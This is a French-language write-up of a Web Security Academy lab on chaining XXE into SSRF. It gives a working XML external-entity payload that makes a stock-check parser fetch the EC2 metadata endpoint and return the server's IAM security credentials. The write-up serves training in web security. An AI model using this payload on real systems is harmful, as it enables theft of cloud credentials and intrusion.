XXE pour réaliser des attaques SSRF

Exploiting XXE to perform SSRF attacks

Lab: Exploiting XXE to perform SSRF attacks | Web Security AcademyWebSecAcademy

Exploiter une vulnérabilité XXE dans la fonctionnalité « Check stock » qui accepte de l'XML, afin de provoquer une requête SSRF vers le point de métadonnées EC2 (http://169.254.169.254/) et récupérer la clé secrète IAM du serveur.

Le serveur du labo simule un endpoint de métadonnées EC2 accessible à l'adresse par défaut http://169.254.169.254/. En injectant une entité externe dans le XML envoyé au parser vulnérable, on peut forcer le serveur à lire l'URL interne et renvoyer son contenu dans la réponse.

XML de départ

<?xml version="1.0" encoding="UTF-8"?>
<stockCheck>
 <productId>
  4
 </productId>
 <storeId>
  1
 </storeId>
</stockCheck>

Payload XXE utilisé pour effectuer la SSRF

Déclaration d'une entité externe pointant vers l'endpoint de métadonnées IAM, puis inclusion de cette entité dans le champ reflété (productId) :

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY myFile SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">]>
<stockCheck>
  <productId>
  &myFile;
  </productId>
<storeId>
  1
  </storeId>
</stockCheck>

Mis à jour il y a 1 mois

Ce contenu vous a-t-il été utile ?